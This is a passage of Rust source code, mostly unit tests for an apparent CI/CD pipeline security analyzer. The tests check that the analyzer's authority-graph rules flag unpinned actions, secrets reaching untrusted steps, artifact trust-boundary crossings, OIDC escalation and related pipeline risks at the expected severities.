6694            // Downgrade is wired into the rule body itself (search for
6695            // `env_gated`) — kept as a no-op match arm here so future
6696            // contributors can find the suppression-pass alongside the
6697            // others.
6698            FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
6699            _ => {}
6700        }
6701    }
6702}
6703
6704#[cfg(test)]
6705mod tests {
6706    use super::*;
6707    use crate::graph::*;
6708
6709    fn source(file: &str) -> PipelineSource {
6710        PipelineSource {
6711            file: file.into(),
6712            repo: None,
6713            git_ref: None,
6714            commit_sha: None,
6715        }
6716    }
6717
6718    #[test]
6719    fn unpinned_third_party_action_flagged() {
6720        let mut g = AuthorityGraph::new(source("ci.yml"));
6721        g.add_node(
6722            NodeKind::Image,
6723            "actions/checkout@v4",
6724            TrustZone::ThirdParty,
6725        );
6726
6727        let findings = unpinned_action(&g);
6728        assert_eq!(findings.len(), 1);
6729        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
6730    }
6731
6732    #[test]
6733    fn pinned_action_not_flagged() {
6734        let mut g = AuthorityGraph::new(source("ci.yml"));
6735        g.add_node(
6736            NodeKind::Image,
6737            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6738            TrustZone::ThirdParty,
6739        );
6740
6741        let findings = unpinned_action(&g);
6742        assert!(findings.is_empty());
6743    }
6744
6745    #[test]
6746    fn untrusted_step_with_secret_is_critical() {
6747        let mut g = AuthorityGraph::new(source("ci.yml"));
6748        let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
6749        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
6750        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6751
6752        let findings = untrusted_with_authority(&g);
6753        assert_eq!(findings.len(), 1);
6754        assert_eq!(findings[0].severity, Severity::Critical);
6755    }
6756
6757    #[test]
6758    fn implicit_identity_downgrades_to_info() {
6759        let mut g = AuthorityGraph::new(source("ci.yml"));
6760        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6761        let mut meta = std::collections::HashMap::new();
6762        meta.insert(META_IMPLICIT.into(), "true".into());
6763        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
6764        let token = g.add_node_with_metadata(
6765            NodeKind::Identity,
6766            "System.AccessToken",
6767            TrustZone::FirstParty,
6768            meta,
6769        );
6770        g.add_edge(step, token, EdgeKind::HasAccessTo);
6771
6772        let findings = untrusted_with_authority(&g);
6773        assert_eq!(findings.len(), 1);
6774        assert_eq!(
6775            findings[0].severity,
6776            Severity::Info,
6777            "implicit token must be Info not Critical"
6778        );
6779        assert!(findings[0].message.contains("platform-injected"));
6780    }
6781
6782    #[test]
6783    fn explicit_secret_remains_critical_despite_implicit_token() {
6784        let mut g = AuthorityGraph::new(source("ci.yml"));
6785        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6786        // implicit token → Info
6787        let mut meta = std::collections::HashMap::new();
6788        meta.insert(META_IMPLICIT.into(), "true".into());
6789        let token = g.add_node_with_metadata(
6790            NodeKind::Identity,
6791            "System.AccessToken",
6792            TrustZone::FirstParty,
6793            meta,
6794        );
6795        // explicit secret → Critical
6796        let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
6797        g.add_edge(step, token, EdgeKind::HasAccessTo);
6798        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6799
6800        let findings = untrusted_with_authority(&g);
6801        assert_eq!(findings.len(), 2);
6802        let info = findings
6803            .iter()
6804            .find(|f| f.severity == Severity::Info)
6805            .unwrap();
6806        let crit = findings
6807            .iter()
6808            .find(|f| f.severity == Severity::Critical)
6809            .unwrap();
6810        assert!(info.message.contains("platform-injected"));
6811        assert!(crit.message.contains("ARM_CLIENT_SECRET"));
6812    }
6813
6814    #[test]
6815    fn artifact_crossing_untrusted_producer_firstparty_consumer_fires() {
6816        // Untrusted producer -> first-party consumer: should fire (poisoned artifact attack)
6817        let mut g = AuthorityGraph::new(source("ci.yml"));
6818        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::Untrusted);
6819        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6820        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6821        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6822
6823        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6824        g.add_edge(build, artifact, EdgeKind::Produces);
6825        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6826
6827        let findings = artifact_boundary_crossing(&g);
6828        assert_eq!(findings.len(), 1);
6829        assert_eq!(
6830            findings[0].category,
6831            FindingCategory::ArtifactBoundaryCrossing
6832        );
6833    }
6834
6835    #[test]
6836    fn artifact_crossing_no_authority_still_fires() {
6837        // The crossing itself is the risk; no HasAccessTo edge required to fire.
6838        let mut g = AuthorityGraph::new(source("ci.yml"));
6839        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6840        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6841        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6842        // No HasAccessTo edge on the producer — previously this caused the rule to skip.
6843        g.add_edge(build, artifact, EdgeKind::Produces);
6844        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6845        let findings = artifact_boundary_crossing(&g);
6846        assert_eq!(
6847            findings.len(),
6848            1,
6849            "boundary crossing must fire without a producer HasAccessTo edge; got: {findings:#?}"
6850        );
6851        assert_eq!(
6852            findings[0].category,
6853            FindingCategory::ArtifactBoundaryCrossing
6854        );
6855    }
6856
6857    // ── Bug regression: run_all_rules dedup ─────────────────────────────────
6858
6859    #[test]
6860    fn run_all_rules_deduplicates_structurally_identical_findings() {
6861        // Regression for Bug 3: BFS can visit the same (step, secret) pair via
6862        // two distinct graph paths. Both visits produce a finding with identical
6863        // category + nodes_involved + message. run_all_rules must emit exactly
6864        // one copy regardless of path count.
6865        let mut g = AuthorityGraph::new(source("ci.yml"));
6866        g.metadata
6867            .insert(META_PLATFORM.into(), "azure-devops".into());
6868        let secret = g.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
6869        let intermediate = g.add_node(NodeKind::Step, "middle-step", TrustZone::FirstParty);
6870        let sink = g.add_node(NodeKind::Step, "sink-step", TrustZone::Untrusted);
6871
6872        // Two paths from secret → sink: direct and via intermediate.
6873        g.add_edge(sink, secret, EdgeKind::HasAccessTo);
6874        g.add_edge(intermediate, secret, EdgeKind::HasAccessTo);
6875        g.add_edge(sink, intermediate, EdgeKind::HasAccessTo);
6876
6877        let findings = run_all_rules(&g, 4);
6878
6879        // Count findings whose nodes_involved contain the sink step.
6880        let sink_findings: Vec<_> = findings
6881            .iter()
6882            .filter(|f| f.nodes_involved.contains(&sink))
6883            .filter(|f| f.nodes_involved.contains(&secret))
6884            .collect();
6885
6886        // Regardless of path count through the graph, each unique
6887        // (category, nodes, message) triple must appear at most once.
6888        let unique_messages: std::collections::HashSet<_> =
6889            sink_findings.iter().map(|f| &f.message).collect();
6890        assert_eq!(
6891            sink_findings.len(),
6892            unique_messages.len(),
6893            "duplicate findings must be deduplicated; got: {findings:#?}"
6894        );
6895    }
6896
6897    #[test]
6898    fn artifact_crossing_same_job_does_not_fire() {
6899        // Upload and download in the same job is a legitimate temp-file pattern.
6900        // META_JOB_NAME guard must suppress the finding.
6901        let mut g = AuthorityGraph::new(source("ci.yml"));
6902        let build = g.add_node_with_metadata(
6903            NodeKind::Step,
6904            "pr-build",
6905            TrustZone::Untrusted,
6906            [(META_JOB_NAME.to_string(), "build".to_string())].into(),
6907        );
6908        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6909        let deploy = g.add_node_with_metadata(
6910            NodeKind::Step,
6911            "deploy",
6912            TrustZone::FirstParty,
6913            [
6914                (META_JOB_NAME.to_string(), "build".to_string()), // SAME job
6915            ]
6916            .into(),
6917        );
6918        g.add_edge(build, artifact, EdgeKind::Produces);
6919        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6920        let findings = artifact_boundary_crossing(&g);
6921        assert_eq!(
6922            findings.len(),
6923            0,
6924            "intra-job upload→download must not fire; got: {findings:#?}"
6925        );
6926    }
6927
6928    #[test]
6929    fn artifact_crossing_firstparty_producer_untrusted_consumer_silent() {
6930        // First-party producer -> untrusted consumer: should NOT fire (benign direction)
6931        let mut g = AuthorityGraph::new(source("ci.yml"));
6932        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
6933        let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
6934        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
6935        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
6936
6937        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6938        g.add_edge(build, artifact, EdgeKind::Produces);
6939        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6940
6941        let findings = artifact_boundary_crossing(&g);
6942        assert_eq!(
6943            findings.len(),
6944            0,
6945            "first-party -> untrusted should not fire"
6946        );
6947    }
6948
6949    #[test]
6950    fn propagation_to_sha_pinned_is_high_not_critical() {
6951        let mut g = AuthorityGraph::new(source("ci.yml"));
6952        let mut meta = std::collections::HashMap::new();
6953        meta.insert(
6954            "digest".into(),
6955            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6956        );
6957        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
6958        let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
6959        let image = g.add_node_with_metadata(
6960            NodeKind::Image,
6961            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6962            TrustZone::ThirdParty,
6963            meta,
6964        );
6965
6966        g.add_edge(step, identity, EdgeKind::HasAccessTo);
6967        g.add_edge(step, image, EdgeKind::UsesImage);
6968
6969        let findings = authority_propagation(&g, 4);
6970        // Should find propagation to the SHA-pinned image
6971        let image_findings: Vec<_> = findings
6972            .iter()
6973            .filter(|f| f.nodes_involved.contains(&image))
6974            .collect();
6975        assert!(!image_findings.is_empty());
6976        // SHA-pinned targets get High, not Critical (non-OIDC source)
6977        assert_eq!(image_findings[0].severity, Severity::High);
6978    }
6979
6980    #[test]
6981    fn oidc_identity_to_pinned_third_party_is_critical() {
6982        let mut g = AuthorityGraph::new(source("ci.yml"));
6983
6984        // OIDC-federated cloud identity — token itself is the threat
6985        let mut id_meta = std::collections::HashMap::new();
6986        id_meta.insert(META_OIDC.into(), "true".into());
6987        let identity = g.add_node_with_metadata(
6988            NodeKind::Identity,
6989            "AWS_OIDC_ROLE",
6990            TrustZone::FirstParty,
6991            id_meta,
6992        );
6993
6994        // SHA-pinned ThirdParty image — would normally be High without OIDC
6995        let mut img_meta = std::collections::HashMap::new();
6996        img_meta.insert(
6997            META_DIGEST.into(),
6998            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6999        );
7000        let image = g.add_node_with_metadata(
7001            NodeKind::Image,
7002            "aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
7003            TrustZone::ThirdParty,
7004            img_meta,
7005        );
7006
7007        // Step in ThirdParty zone holds the OIDC identity and uses the pinned image
7008        let step = g.add_node(
7009            NodeKind::Step,
7010            "configure-aws-credentials",
7011            TrustZone::ThirdParty,
7012        );
7013        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7014        g.add_edge(step, image, EdgeKind::UsesImage);
7015
7016        let findings = authority_propagation(&g, 4);
7017        let image_findings: Vec<_> = findings
7018            .iter()
7019            .filter(|f| f.nodes_involved.contains(&image))
7020            .collect();
7021        assert!(
7022            !image_findings.is_empty(),
7023            "expected OIDC→pinned propagation finding"
7024        );
7025        // OIDC source escalates pinned ThirdParty from High → Critical
7026        assert_eq!(image_findings[0].severity, Severity::Critical);
7027    }
7028
7029    #[test]
7030    fn propagation_to_untrusted_is_critical() {
7031        let mut g = AuthorityGraph::new(source("ci.yml"));
7032        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7033        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7034        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7035
7036        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7037        g.add_edge(step, image, EdgeKind::UsesImage);
7038
7039        let findings = authority_propagation(&g, 4);
7040        let image_findings: Vec<_> = findings
7041            .iter()
7042            .filter(|f| f.nodes_involved.contains(&image))
7043            .collect();
7044        assert!(!image_findings.is_empty());
7045        assert_eq!(image_findings[0].severity, Severity::Critical);
7046    }
7047
7048    #[test]
7049    fn long_lived_credential_detected() {
7050        let mut g = AuthorityGraph::new(source("ci.yml"));
7051        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
7052        g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
7053        g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
7054        // Non-matching names
7055        g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
7056
7057        let findings = long_lived_credential(&g);
7058        assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
7059        assert!(findings
7060            .iter()
7061            .all(|f| f.category == FindingCategory::LongLivedCredential));
7062    }
7063
7064    #[test]
7065    fn duplicate_unpinned_actions_deduplicated() {
7066        let mut g = AuthorityGraph::new(source("ci.yml"));
7067        // Same action used in two jobs — two Image nodes, same name
7068        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7069        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7070        g.add_node(
7071            NodeKind::Image,
7072            "actions/setup-node@v3",
7073            TrustZone::Untrusted,
7074        );
7075
7076        let findings = unpinned_action(&g);
7077        // Should get 2 findings (checkout + setup-node), not 3
7078        assert_eq!(findings.len(), 2);
7079    }
7080
7081    #[test]
7082    fn broad_identity_scope_flagged_as_high() {
7083        let mut g = AuthorityGraph::new(source("ci.yml"));
7084        let mut meta = std::collections::HashMap::new();
7085        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7086        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7087        let identity = g.add_node_with_metadata(
7088            NodeKind::Identity,
7089            "GITHUB_TOKEN",
7090            TrustZone::FirstParty,
7091            meta,
7092        );
7093        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7094        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7095
7096        let findings = over_privileged_identity(&g);
7097        assert_eq!(findings.len(), 1);
7098        assert_eq!(findings[0].severity, Severity::High);
7099        assert!(findings[0].message.contains("broad"));
7100    }
7101
7102    #[test]
7103    fn unknown_identity_scope_flagged_as_medium() {
7104        let mut g = AuthorityGraph::new(source("ci.yml"));
7105        let mut meta = std::collections::HashMap::new();
7106        meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
7107        meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
7108        let identity = g.add_node_with_metadata(
7109            NodeKind::Identity,
7110            "GITHUB_TOKEN",
7111            TrustZone::FirstParty,
7112            meta,
7113        );
7114        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7115        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7116
7117        let findings = over_privileged_identity(&g);
7118        assert_eq!(findings.len(), 1);
7119        assert_eq!(findings[0].severity, Severity::Medium);
7120        assert!(findings[0].message.contains("unknown"));
7121    }
7122
7123    #[test]
7124    fn floating_image_unpinned_container_flagged() {
7125        let mut g = AuthorityGraph::new(source("ci.yml"));
7126        let mut meta = std::collections::HashMap::new();
7127        meta.insert(META_CONTAINER.into(), "true".into());
7128        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7129
7130        let findings = floating_image(&g);
7131        assert_eq!(findings.len(), 1);
7132        assert_eq!(findings[0].category, FindingCategory::FloatingImage);
7133        assert_eq!(findings[0].severity, Severity::Medium);
7134    }
7135
7136    #[test]
7137    fn partial_graph_preserves_critical_findings() {
7138        let mut g = AuthorityGraph::new(source("ci.yml"));
7139        g.mark_partial("matrix strategy hides some authority paths");
7140
7141        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7142        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7143        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7144
7145        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7146        g.add_edge(step, image, EdgeKind::UsesImage);
7147
7148        let findings = run_all_rules(&g, 4);
7149        assert!(findings
7150            .iter()
7151            .any(|f| f.category == FindingCategory::AuthorityPropagation));
7152        assert!(findings
7153            .iter()
7154            .any(|f| f.category == FindingCategory::UntrustedWithAuthority));
7155        assert!(
7156            findings.iter().any(|f| f.severity == Severity::Critical),
7157            "partial graph completeness must not down-rank critical findings"
7158        );
7159    }
7160
7161    #[test]
7162    fn unknown_graph_preserves_critical_findings() {
7163        let mut g = AuthorityGraph::new(source("ci.yml"));
7164        g.completeness = crate::graph::AuthorityCompleteness::Unknown;
7165
7166        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7167        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7168        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7169
7170        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7171        g.add_edge(step, image, EdgeKind::UsesImage);
7172
7173        let findings = run_all_rules(&g, 4);
7174        assert!(
7175            findings.iter().any(|f| f.severity == Severity::Critical),
7176            "unknown graph completeness must not down-rank critical findings"
7177        );
7178    }
7179
7180    #[test]
7181    fn complete_graph_keeps_critical_findings() {
7182        let mut g = AuthorityGraph::new(source("ci.yml"));
7183
7184        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7185        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7186        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7187
7188        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7189        g.add_edge(step, image, EdgeKind::UsesImage);
7190
7191        let findings = run_all_rules(&g, 4);
7192        assert!(findings.iter().any(|f| f.severity == Severity::Critical));
7193    }
7194
7195    #[test]
7196    fn floating_image_digest_pinned_container_not_flagged() {
7197        let mut g = AuthorityGraph::new(source("ci.yml"));
7198        let mut meta = std::collections::HashMap::new();
7199        meta.insert(META_CONTAINER.into(), "true".into());
7200        g.add_node_with_metadata(
7201            NodeKind::Image,
7202            "ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
7203            TrustZone::ThirdParty,
7204            meta,
7205        );
7206
7207        let findings = floating_image(&g);
7208        assert!(
7209            findings.is_empty(),
7210            "digest-pinned container should not be flagged"
7211        );
7212    }
7213
7214    #[test]
7215    fn unpinned_action_does_not_flag_container_images() {
7216        // Regression: container Image nodes are handled by floating_image, not unpinned_action.
7217        // The same node must not generate findings from both rules.
7218        let mut g = AuthorityGraph::new(source("ci.yml"));
7219        let mut meta = std::collections::HashMap::new();
7220        meta.insert(META_CONTAINER.into(), "true".into());
7221        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7222
7223        let findings = unpinned_action(&g);
7224        assert!(
7225            findings.is_empty(),
7226            "unpinned_action must skip container images to avoid double-flagging"
7227        );
7228    }
7229
7230    #[test]
7231    fn floating_image_ignores_action_images() {
7232        let mut g = AuthorityGraph::new(source("ci.yml"));
7233        // Image node without META_CONTAINER — this is a step uses: action, not a container
7234        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7235
7236        let findings = floating_image(&g);
7237        assert!(
7238            findings.is_empty(),
7239            "floating_image should not flag step actions"
7240        );
7241    }
7242
7243    #[test]
7244    fn persisted_credential_rule_fires_on_persists_to_edge() {
7245        let mut g = AuthorityGraph::new(source("ci.yml"));
7246        let token = g.add_node(
7247            NodeKind::Identity,
7248            "System.AccessToken",
7249            TrustZone::FirstParty,
7250        );
7251        let checkout = g.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
7252        g.add_edge(checkout, token, EdgeKind::PersistsTo);
7253
7254        let findings = persisted_credential(&g);
7255        assert_eq!(findings.len(), 1);
7256        assert_eq!(findings[0].category, FindingCategory::PersistedCredential);
7257        assert_eq!(findings[0].severity, Severity::High);
7258        assert!(findings[0].message.contains("persistCredentials"));
7259    }
7260
7261    #[test]
7262    fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
7263        let mut g = AuthorityGraph::new(source("ci.yml"));
7264        let step = g.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
7265        let mut meta = std::collections::HashMap::new();
7266        meta.insert(META_CLI_FLAG_EXPOSED.into(), "true".into());
7267        let secret =
7268            g.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, meta);
7269        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7270
7271        let findings = untrusted_with_authority(&g);
7272        assert_eq!(findings.len(), 1);
7273        assert!(
7274            findings[0].message.contains("-var flag"),
7275            "message should note -var flag log exposure"
7276        );
7277        assert!(matches!(
7278            findings[0].recommendation,
7279            Recommendation::Manual { .. }
7280        ));
7281    }
7282
7283    #[test]
7284    fn constrained_identity_scope_not_flagged() {
7285        let mut g = AuthorityGraph::new(source("ci.yml"));
7286        let mut meta = std::collections::HashMap::new();
7287        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
7288        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
7289        let identity = g.add_node_with_metadata(
7290            NodeKind::Identity,
7291            "GITHUB_TOKEN",
7292            TrustZone::FirstParty,
7293            meta,
7294        );
7295        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7296        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7297
7298        let findings = over_privileged_identity(&g);
7299        assert!(
7300            findings.is_empty(),
7301            "constrained scope should not be flagged"
7302        );
7303    }
7304
7305    #[test]
7306    fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
7307        let mut g = AuthorityGraph::new(source("ci.yml"));
7308        g.metadata
7309            .insert(META_TRIGGER.into(), "pull_request_target".into());
7310        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7311        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7312        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7313
7314        let findings = trigger_context_mismatch(&g);
7315        assert_eq!(findings.len(), 1);
7316        assert_eq!(findings[0].severity, Severity::Critical);
7317        assert_eq!(
7318            findings[0].category,
7319            FindingCategory::TriggerContextMismatch
7320        );
7321    }
7322
7323    #[test]
7324    fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
7325        let mut g = AuthorityGraph::new(source("ci.yml"));
7326        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7327        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7328        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7329
7330        let findings = trigger_context_mismatch(&g);
7331        assert!(findings.is_empty(), "no trigger metadata → no finding");
7332    }
7333
7334    #[test]
7335    fn cross_workflow_authority_chain_detected() {
7336        let mut g = AuthorityGraph::new(source("ci.yml"));
7337        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7338        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7339        let external = g.add_node(
7340            NodeKind::Image,
7341            "evil/workflow.yml@main",
7342            TrustZone::Untrusted,
7343        );
7344        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7345        g.add_edge(step, external, EdgeKind::DelegatesTo);
7346
7347        let findings = cross_workflow_authority_chain(&g);
7348        assert_eq!(findings.len(), 1);
7349        assert_eq!(findings[0].severity, Severity::Critical);
7350        assert_eq!(
7351            findings[0].category,
7352            FindingCategory::CrossWorkflowAuthorityChain
7353        );
7354    }
7355
7356    #[test]
7357    fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
7358        let mut g = AuthorityGraph::new(source("ci.yml"));
7359        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7360        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7361        let local = g.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
7362        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7363        g.add_edge(step, local, EdgeKind::DelegatesTo);
7364
7365        let findings = cross_workflow_authority_chain(&g);
7366        assert!(
7367            findings.is_empty(),
7368            "FirstParty delegation should not be flagged"
7369        );
7370    }
7371
7372    #[test]
7373    fn authority_cycle_detected() {
7374        let mut g = AuthorityGraph::new(source("ci.yml"));
7375        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7376        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7377        g.add_edge(a, b, EdgeKind::DelegatesTo);
7378        g.add_edge(b, a, EdgeKind::DelegatesTo);
7379
7380        let findings = authority_cycle(&g);
7381        assert_eq!(findings.len(), 1);
7382        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7383        assert_eq!(findings[0].severity, Severity::High);
7384    }
7385
7386    #[test]
7387    fn authority_cycle_no_fire_for_acyclic_graph() {
7388        let mut g = AuthorityGraph::new(source("ci.yml"));
7389        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7390        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7391        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7392        g.add_edge(a, b, EdgeKind::DelegatesTo);
7393        g.add_edge(b, c, EdgeKind::DelegatesTo);
7394
7395        let findings = authority_cycle(&g);
7396        assert!(findings.is_empty(), "acyclic graph must not fire");
7397    }
7398
7399    #[test]
7400    fn uplift_without_attestation_fires_when_oidc_no_attests() {
7401        let mut g = AuthorityGraph::new(source("ci.yml"));
7402        let mut meta = std::collections::HashMap::new();
7403        meta.insert(META_OIDC.into(), "true".into());
7404        let identity = g.add_node_with_metadata(
7405            NodeKind::Identity,
7406            "AWS/deploy-role",
7407            TrustZone::FirstParty,
7408            meta,
7409        );
7410        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7411        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7412
7413        let findings = uplift_without_attestation(&g);
7414        assert_eq!(findings.len(), 1);
7415        assert_eq!(findings[0].severity, Severity::Info);
7416        assert_eq!(
7417            findings[0].category,
7418            FindingCategory::UpliftWithoutAttestation
7419        );
7420    }
7421
7422    #[test]
7423    fn uplift_without_attestation_no_fire_when_attests_present() {
7424        let mut g = AuthorityGraph::new(source("ci.yml"));
7425        let mut id_meta = std::collections::HashMap::new();
7426        id_meta.insert(META_OIDC.into(), "true".into());
7427        let identity = g.add_node_with_metadata(
7428            NodeKind::Identity,
7429            "AWS/deploy-role",
7430            TrustZone::FirstParty,
7431            id_meta,
7432        );
7433        let mut step_meta = std::collections::HashMap::new();
7434        step_meta.insert(META_ATTESTS.into(), "true".into());
7435        let attest_step =
7436            g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
7437        let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7438        g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
7439        // Touch attest_step so the variable is used (avoid unused warning)
7440        let _ = attest_step;
7441
7442        let findings = uplift_without_attestation(&g);
7443        assert!(findings.is_empty(), "attestation present → no finding");
7444    }
7445
7446    #[test]
7447    fn uplift_without_attestation_no_fire_without_oidc() {
7448        let mut g = AuthorityGraph::new(source("ci.yml"));
7449        let mut meta = std::collections::HashMap::new();
7450        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7451        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7452        // Note: no META_OIDC
7453        let identity = g.add_node_with_metadata(
7454            NodeKind::Identity,
7455            "GITHUB_TOKEN",
7456            TrustZone::FirstParty,
7457            meta,
7458        );
7459        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7460        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7461
7462        let findings = uplift_without_attestation(&g);
7463        assert!(
7464            findings.is_empty(),
7465            "broad identity without OIDC must not fire"
7466        );
7467    }
7468
7469    #[test]
7470    fn self_mutating_pipeline_untrusted_is_critical() {
7471        let mut g = AuthorityGraph::new(source("ci.yml"));
7472        let mut meta = std::collections::HashMap::new();
7473        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7474        g.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, meta);
7475
7476        let findings = self_mutating_pipeline(&g);
7477        assert_eq!(findings.len(), 1);
7478        assert_eq!(findings[0].severity, Severity::Critical);
7479        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7480    }
7481
7482    #[test]
7483    fn self_mutating_pipeline_privileged_step_is_high() {
7484        let mut g = AuthorityGraph::new(source("ci.yml"));
7485        let mut meta = std::collections::HashMap::new();
7486        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7487        let step = g.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, meta);
7488        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7489        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7490
